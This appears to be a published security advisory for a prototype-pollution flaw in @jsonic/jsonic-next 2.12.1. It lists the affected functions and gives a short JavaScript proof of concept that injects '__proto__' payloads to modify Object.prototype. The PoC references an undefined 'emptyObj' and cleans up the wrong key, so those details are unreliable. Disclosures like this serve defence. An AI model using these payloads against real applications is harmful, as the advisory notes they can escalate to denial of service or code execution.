mestrtee/Advisory_rjrodger.md

## Advisory_rjrodger.md

      
    Raw
  

              Advisory_rjrodger.md
            
          
    Vulnerability type:
Prototype Pollution
Vendor of the Package:
rjrodger
Affected Package:

Product: @jsonic/jsonic-next
Version: 2.12.1

Affected component(s):
empty, util.clone, util.prop, util.deep, make
Attack vector(s):
the attacker can modify built-in Object.prototype by calling the vulnerable function: empty, util.clone, util.prop, util.deep, make with an argument containing a special property __proto__ to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.
Description:
Affected versions of this package are vulnerable to Prototype Pollution through the vulnerable function: empty, util.clone, util.prop, util.deep, make. An attacker can alter the behavior of all objects inheriting from the affected prototype by passing arguments to the vulenrable function crafted with the built-in property: __proto__. The attack can potentially escalated to Denial of service, remote code execution or cross-site scripting attacks depends on the gadgets that may affected by the attack
Proof-of-Concept:
(async () => {
  const lib = await import('@jsonic/jsonic-next');

  var victim = {}

  console.log("Before Attack: ", JSON.stringify(victim.__proto__));

  try {

  lib.empty (JSON.parse('{"__proto__":{"test":123}}'))
lib.util.clone (JSON.parse('{"__proto__":{"test":123}}'))
lib.util.prop (emptyObj, "__proto__.test", 123)
lib.util.deep (emptyObj, JSON.parse('{"__proto__":{"test":123}}'))
lib.make (JSON.parse('{"__proto__":{"test":123}}'))

  } catch (e) { }

  console.log("After Attack: ", JSON.stringify(victim.__proto__));

  delete Object.prototype.polluted;

  })();